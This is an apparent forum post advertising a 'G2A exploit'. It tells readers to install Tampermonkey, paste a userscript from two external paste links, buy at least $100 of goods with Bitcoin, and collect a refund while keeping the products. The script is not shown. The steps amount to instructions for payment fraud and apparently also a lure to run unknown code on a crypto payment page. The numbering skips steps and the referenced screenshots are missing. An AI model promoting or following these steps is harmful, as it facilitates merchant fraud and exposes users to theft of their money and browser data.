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INSTRUCTIONS:
1. Install a Google Chrome extension called “Tampermonkey”.
2. Add the script to tampermonkey. (links will be provided)
3. Create a new order on G2A and pay for the products by Bitcoin.
4. Claim your products. (Order will be successfully processed by G2A)
5. Wait a few minutes for a refund to your wallet of choice.
Important! - PLEASE READ:
Keep in mind that BitBay will only refund your expired order only if it’s above $100. Any lower amount is not
prioritized by their system, therefore it will require you to contact G2A’s
support to get a refund. This will result in your request getting REJECTED, as they will find out that the
order was already processed by them. If you use any amount higher than $100 ,
it will get automatically refunded without problems.
Basically you have to add to your cart products that are worth atl east $100 in total, it could
be one or multiple products in your cart - it doesn’t matter. There is absolutely NO LIMITS on the maximum worth of
your cart. I have personally purchased 5 x $100 Amazon Giftcards in one order.
Okay, let’s begin.
Here are the things you need:
- At least 100 $ to pay for the order.
Edit: I was getting questions if this script could work for other
payment methods. The answer is No. If you want to use this method, you would
have to use Bitcoin. It’s not hard to buy crypto nowadays, so I guess it
shouldn’t be a problem at all. BTC transactions on G2A go through NO verification at all
compared to other payment methods like PayPal or Card.
Currently, I've only found an exploit for BTC.
Okay, if you're ready - follow my steps:
Step 1. Add Tampermonkey extension to your browser.
Step 3. Remove any preset code so you have a clean page like on the
screenshot:
Step 4. Click on the link below and copy the whole script:
https://pastes.io/raw/2xuu25apgx
https://pastes.io/raw/j7d85zby8p
Step 8. As soon as the payment page starts to load, you should see this
message. Simply press “OK” to continue.
Step 9. Now choose Bitcoin.
I sent a payment at 4:02 AM and the money was refunded 10 minutes later.
And this is what I got on my email: